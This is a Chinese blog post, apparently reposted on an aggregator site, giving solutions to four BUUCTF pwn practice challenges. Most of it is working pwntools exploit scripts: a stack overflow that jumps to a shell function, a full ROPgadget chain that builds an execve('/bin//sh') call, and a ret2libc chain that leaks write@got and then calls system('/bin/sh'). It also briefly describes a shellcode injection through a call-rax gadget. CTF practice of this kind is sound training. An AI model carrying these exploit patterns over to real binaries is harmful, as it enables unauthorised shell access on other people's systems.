PWN-PRACTICE-BUUCTF-13
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-13
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
PWN-PRACTICE-BUUCTF-13
- [ZJCTF 2019]Login
- inndy_rop
- mrctf2020_shellcode
- jarvisoj_level1
[ZJCTF 2019]Login
參考:ZJCTF 2019 Pwn
from pwn import * io=remote('node4.buuoj.cn',27513) #io = process("./login") shell = 0x400e88 io.recvuntil("username: ") io.sendline("admin") io.recvuntil("password: ") payload="2jctf_pa5sw0rd"+"\x00"*58+p64(shell) io.sendline(payload) io.interactive()inndy_rop
靜態(tài)鏈接的32位elf,用ROPgadget直接找一條rop鏈
ROPgadget --binary inndy_rop --ropchain from pwn import * from struct import pack #io=process('./inndy_rop') io=remote('node4.buuoj.cn',25930) def ROPchain():p = 'a'*(0xc+4)p += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea060) # @ .datap += pack('<I', 0x080b8016) # pop eax ; retp += '/bin'p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea064) # @ .data + 4p += pack('<I', 0x080b8016) # pop eax ; retp += '//sh'p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x080492d3) # xor eax, eax ; retp += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x080481c9) # pop ebx ; retp += pack('<I', 0x080ea060) # @ .datap += pack('<I', 0x080de769) # pop ecx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x080492d3) # xor eax, eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0806c943) # int 0x80return p payload=ROPchain() io.sendline(payload) io.interactive()mrctf2020_shellcode
在偏移0x00000000000011DD處有條call rax的gadget,這里的rax就是我們輸入內(nèi)容的地址
于是這道題直接輸入shellcode,elf執(zhí)行call rax即可getshell
jarvisoj_level1
32位elf的棧溢出,ret2libc
from pwn import * #context.log_level = 'debug' #p = process('./jarvisoj_level1') p=remote('node4.buuoj.cn',25340) elf = ELF('./jarvisoj_level1') libc=ELF('./libc-2.23-x32.so') write_plt=elf.plt['write'] write_got=elf.got['write'] main_addr=elf.symbols['main'] payload1='A'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4) p.sendline(payload1) write_addr = u32(p.recv(4)) print('write addr: '+hex(write_addr)) libc_base=write_addr-libc.sym['write'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search('/bin/sh\x00').next() payload='A'*140+p32(system)+p32(0)+p32(binsh) p.sendline(payload) p.interactive()總結(jié)
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-13的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 银行存款最新利率公布,选错了银行,存十万
- 下一篇: 油价传出好消息,刚小幅上涨后有可能大降?